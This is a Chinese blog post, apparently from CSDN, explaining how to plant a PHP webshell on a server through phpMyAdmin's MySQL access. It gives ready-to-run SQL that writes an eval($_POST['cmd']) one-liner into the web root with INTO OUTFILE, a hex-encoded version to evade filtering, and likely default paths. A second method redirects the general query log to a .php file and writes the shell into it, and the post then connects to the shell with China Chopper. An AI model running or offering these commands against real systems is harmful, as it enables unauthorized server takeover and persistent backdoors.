phpmyadmin_getshell

最新推荐文章于 2023-05-23 18:12:54 发布
最新推荐文章于 2023-05-23 18:12:54 发布
阅读量719 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46128614/article/details/105136626
版权
本文详细介绍如何通过MySQL的文件写入功能将WebShell注入指定路径,包括使用十六进制编码绕过过滤、确保操作系统的MySQL用户有写权限、调整secure_file_priv参数以及通过日志记录写入Shell的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. select xx into outfile xx

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php';

如果括号被过滤就用十六进制

select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'C:\wamp\www\webshell.php' ;

key:cmd
前提有三个:
a. 知道绝对路径
在没有搜集到其他信息的时候,可以猜默认路径

C:\wamp\www\webshell.php
D:\phpStudy\www\xxx.php
/var/www/html

b. 操作系统上的mysql用户对目录有写权限
c. mysql自身的secure_file_priv允许导入文件
可以查询
在这里插入图片描述

show global variables like '%secure%';

secure_file_priv NULL 表示不允许导入导出,在mysql下的my.ini文件中设置
为空则是不限制

  1. 开启记录日志,然后在起日志中写入一个shell
    a. show variables like '%general%';
    b. general_log on为开启
    如果为off,输入
set global general_log='on'

修改日志文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

然后输入一段shell,存进日志

SELECT '<?php eval($_POST["cmd"]);?>'

因为这段shell里带有分号;所以一定要用引号’'引起来
在这里插入图片描述
然后菜刀连上
在这里插入图片描述

getshellphpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 974
访问一下 最后getshell
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 2304
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
xxx.com和www.xxx.com的区别
weixin_42613703的博客
12-22 86万+
XXX.com 是主域名! WWW.xxx.com 一般是域名的主页! 在很多情况下,会配置成一样!!! 也有可能,主域名不配置到具体的IP,可能无法解析。。 C:\Windows\system32&gt;nslookup baidu.com 服务器: UnKnown Address: 61.128.114.133 非权威应答: 名称: baidu.com Addresses: 22...
wwwxxx域名选择(www.xxx.com或者.cn)
热门推荐
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-26 97万+
域名就是网站的网址,就跟家庭住址一样,那么域名就是我们网站的地址,我们使用方便记忆的域名(字母/数字+.COM等域名后缀:www.xxx.com)。 按所属机构分常见后缀形式: COM:商业性的机构/公司/个人,因为COM这个后缀公信度高,所以用得比较多 ORG :非盈利的组织、团体 GOV:政府部门 NET:从事Internet相关的的机构或公司 EDU:教育机构 .互联网通用顶级域之一,主要供教育机构,如大学等院校使用,实际使用的教育机构大部分位于美国。 注意:还有很多,但是不常见,就先不
在网址上输入www.xxx.com到返回界面给用户发生了什么?
weixin_51287642的博客
08-06 30万+
在网址上输入www.xxx.com到返回界面给用户发生了什么? DNS域名解析(https://blog.youkuaiyun.com/yanshuanche3765/article/details/82589210)–>tcp三次握手建立连接(https://blog.youkuaiyun.com/xy010902100449/article/details/48274635)–>向服务器发送http请求,请求html文件–>服务器返回一个html文件–>tcp四次握手释放连接–>游览器解释html
未匹配到本域名(www.xxx.com)有效授权码,请到PbootCMS官网获取
糖果云专栏
05-23 15万+
PbootCMS默认授权提示语句为:未匹配到本域名(www.xxx.com)有效授权码,请到PbootCMS官网获取,并填写到网站后台"全局配置>>配置参数"中。
ThinkPHP下访问www.xxx.com访问成功www.xxx.com/后加上index、admin等报错
m0_37360025的博客
05-22 9万+
原因主要是Apache不支持.htaccess 1.httpd.conf,如果是多域名的要加上httpd-vhosts.conf Options FollowSymLinks AllowOverride None 改为: Options FollowSymLinks AllowOverride All 2. httpd.conf中开启LoadModule rewrite_module modules/mod_rewrite.so ...
phpMyAdmin后台getshell复现
最新发布
09-18
本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦登录后,攻击者可以利用phpMyAdmin的日志记录功能来执行特定的操作,进而实现getshell。具体...
phpmyadmin后台GetShell总结
李火火的安全圈
02-18 590
文章目录前言一、phpmyadmin简介二、phpmyadmin寻找、登录三、利用函数写入文件四、secure_file_priv函数五、日志文件写入Webshell六、通过慢查询方式getshell七、phpmyadmin4.8.1远程文件包含漏洞影响版本漏洞分析及复现漏洞防范 前言 文章仅用于技术学习与安全研究,切勿用于非授权下的渗透行为,出现任何后果与本文作者无关。 !!!且行且珍惜!!! 一、phpmyadmin简介 phpmyadmin是一个以PHP为基础,以web-base方式架构在网站
phpmyadmin+日志getshell
Zlirving_的博客
06-16 2003
通过phpmyadmin管理后台getshell思路有很多种,比如直接写入一句话、创建表再导出、慢查询日志等… 这里较详细介绍一下普通日志getshell思路   phpMyAdmin phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。   GetSHELL前提 phpMyAdmin利用日志文件GetSHELL
如何在本地设置www.xxx.com,使其允许访问
weixin_30429201的博客
04-21 19万+
1. 打开C:\Windows\System32\Drivers\etc 的hosts 文件 2. 在host文件写一行话: 192.168.1.40 www.xxx.com 3. 这样就可以打开 www.xxx.com 4. 若有开防火墙,须对端口开例外 转载于:https://www.cnblogs.com/kittyguo/p/5417744.html...
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 44万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
thinkphp 项目,本地项目用www.XXX(自己填的名称).com访问方式
weixin_42231483的博客
08-03 8万+
本地项目用www.XXX(自己填的名称).com访问方式 第一步 : 先进入 C:\Windows\System32\drivers\etc\hosts 打开hosts文件,在最后一行添加 127.0.0.1 localhost www.xxx1.com www.xxx2.com www.xxx3.com … 等等 www.xxx1.com 就是自...
无法解决此远程名称:“www.xxxxxx.com“的解决方法
dingyi0739的博客
09-02 42万+
分析原因:从防火墙屏蔽端口到支付宝签约id是否过期,最后才找出原因,原来我的服务器DNS解析错误,无法访问到调用的远程服务器。原因是:服务器不能上外网。 解决办法如下: 在服务器上执行:开始|运行|cmd ping www.***com //注:ping 后面的地址是你调用的远程服务器的域名。 如果可以ping通,说明DNS解析正确。 ...
ios局域网ota无法连接www.xxx.com的问题解决记录。
qq_35916684的博客
07-31 5万+
提示无法连接局域网内ota服务 1、业务中要使用内网分发ipa包,但总是显示无法连接www.xxx.com,但吧manifest.plist发送至服务器上nginx来处理却没有问题且可以正常下载,而且发送到服务器的manifest.plist文件内的下载链接还是本地的网址。 分析问题。 本地和线上没有区别,只是域名不同。把两边都下载一遍发现,本地的是直接在浏览器内打开。而线上却是自动下载了。 那么...
xxx.com跳到www.xxx.com的处理(301重定向)
maorenqi101的专栏
07-17 10万+
方法就是,在根目录 下添加 .htaccess,里面添加如下代码: RewriteEngine On RewriteCond %{http_host} ^XXX.com [NC] RewriteRule ^(.*)$ http://www.XXX.com/$1 [R=301.L]
当你在浏览器输入www.xxx.com的时候会发生什么?
路辉的博客
02-03 6万+
https的访问流程HTTP和HTTPS区别https的访问流程加密CA证书TCP三次握手、四次分手具体的流程 HTTP和HTTPS区别 http(80端口):超文本传输协议,明文传输,不安全,免费的,无状态的 https(443端口):加密安全版的http,通过在http下层加入ssl协议,ssl协议依靠CA证书,证书需要一定的费用,有身份认证的,不是无状态的 https的访问流程 在了解https的访问流程之前,有几个小知识需要先简单了解一下 加密 对称加密:加密解密用的都是一个秘钥 非对称加密:
WWWWXXX
m0_63425325的博客
10-24 27万+
WWWS
报错 | Access to XMLHttpRequest at ‘http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login‘ from origin
A123ppleQueen的博客
11-22 50万+
Access to XMLHttpRequest at 'http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login' from origin 'http://xx.x.x.xx:xxxx' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is pre
复现phpmyadmin后台getshell
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值